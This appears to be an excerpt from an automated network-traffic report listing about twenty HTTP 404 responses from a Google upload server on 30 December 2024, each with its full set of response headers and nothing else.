                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6HjS2LZhbcGPSGowaIXzbvS8zp4gPuvoQKlvUQ23kkfXHyIJnqznf9M1CXb5K5ENDs2IFV7EQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:44 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-HjljMUQ8JXEj-YAHg7kWKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7RU4jWpoOyq_fvQkvx9X4v_z6GEQ9DAelptv-f2qz1GSlQmX6vqFwkTqkqFDXKAd3ZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:44 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-lGU5AHtUqSZmJzuePf6TUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6c0TIrRIk97t1Jr611uUny5uSNuUGcyNuIlKJJeaJKY4IlmsnldZSc2kBN1i2n24VkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:46 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-xj94ZCwTsxwd-CI2ClAkIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7UJy_zeg5-NKA4jWQbWcGO8KUIvoCdJzPazZN9BF5w-N73znTyO2WAMErNBDPnjDc6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:47 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-wQQ9xDOQtK9h_I33uXQtrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4NPnyuPuo627mGVkIHYHNTODlFAUEb9a1x0vu809gsNT5rPkTzvPWJH-n9S1RBkg4RP9lO9okContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:47 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-7x1LYiQYv-1TRgfMwOCTQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7KLFUzBUDqk6-iriMtdDwqt4tTqbTHSgwjmSN9hg3M_6a2Bpjxw78Yjwoe2JQecEJaContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:48 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-_AvqLEvdlrtumAnwbtXgcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7hUXUoJxNf5JNQ-4WeN5jArb5BtSJwve_aYd7OmhZ7VX_h6lVNyKlmiXdDwPZfpyaGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:49 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-Z4uXlXGUD4Pg68MgaPc0sA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7kasKj1-HIRSNKNTgYCaGRvgq23ksbRw6db3M04rBbzf2GJrm3tDctiSsuxruGToDMJkc1RLkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:49 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-hRjFIFkDEutSfuuEQOcuiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6akkKnpOigftMaCiywablOKUnwStRRSmcJV54lSz-aMG-1atZn4ObKnWZSSE0nG18mSAf3afEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:50 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EdYe7V9LT1smBrek8aYxNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Pd2JZdLN5rxP2YRFlt1z5ZK45_21DhlLbN3VLWNBC2cOchmIhdJFXN24QPs4xBe4RYqqdU_cContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:51 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-oS-mmyYWXisnZt2GA575MA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6gTZ1GLjWAi_LNWUp6_920NWYSkqnv_mj1ErfNpW1wyRK9rieehWMOFkUkWHN7aCGzContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:51 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-F9H49tN0mxGEXD8F9w8QrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4JtAQ2gGlGyOhTHfM3BPddoL2OrRHWFt48QlE9Q8PnOWeo1omrR8MWOfJzGBPruBx_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:52 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-UyvE_SHWJefABK4uFAfPnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC42zK-9Zkj0LXEoNdxqsVwikXZfQJHsfpVu7Mx-5vRWLKHsEhe8QqqcYmWZi-w73nkIZ6NgONAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:52 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-31ZoMVaTgvf5rIikqJINOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7oYeIExfFFz7ZNX2PkjYysp6pY9NwEDg0wMpFb7-uuZI8clsGofU4cAl4NjiKN6EHvContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:55 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-isOe_j6ioAJQ7WAly06a2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4NwifMZmEHphfp9UN4wU4GMRE4HVThdXF3fZv-t6VSK151IgnRxXR-rLT8hFJuvr2IOnMUNxEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:55 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Zu74I3I4jmhFTDayur7sYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5mUzotdv3RyN70bsUnZV5ja2p9Ohzu6jggwqtSvJpnFYrQ9nv0wlw6XJwUx0nsHpXZlsOkemEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:56 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-DvN0uf_UebqjHhNxLnrnFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5n1PMPaafd9RNRz0i04F-jp51ZGFUe2IjWY6Uc6aE0XP8LvaO5ykTv3N1RAIMycw-ZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:56 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-srCzE_eNg2l_t1RD-ZG8Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7moJQJ5z6Iadwrcn9eO-tScHtJwi302NMRpFc3DYyzErylAT0RF0glwHQPtmAvOrVGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:58 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Vxg2Nnzn978BGN6fMtUsZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6mc2VWXMoauzpyKDVWXyEuRoMX97nSbAhQlcVxyvAWQFXFsRUa3PEX34zL4axQqnurfP0CfdAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:58 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-he0L_kENWUKRtxkpNs8jfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC585exS7V1Z7JWd0tPOyjazb13Q59T52u4H4N39Nt8xgxigS2_cWQacv5BQ8FP8d2E0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:59 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-wtnUeU-rC78gT31l6dENfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
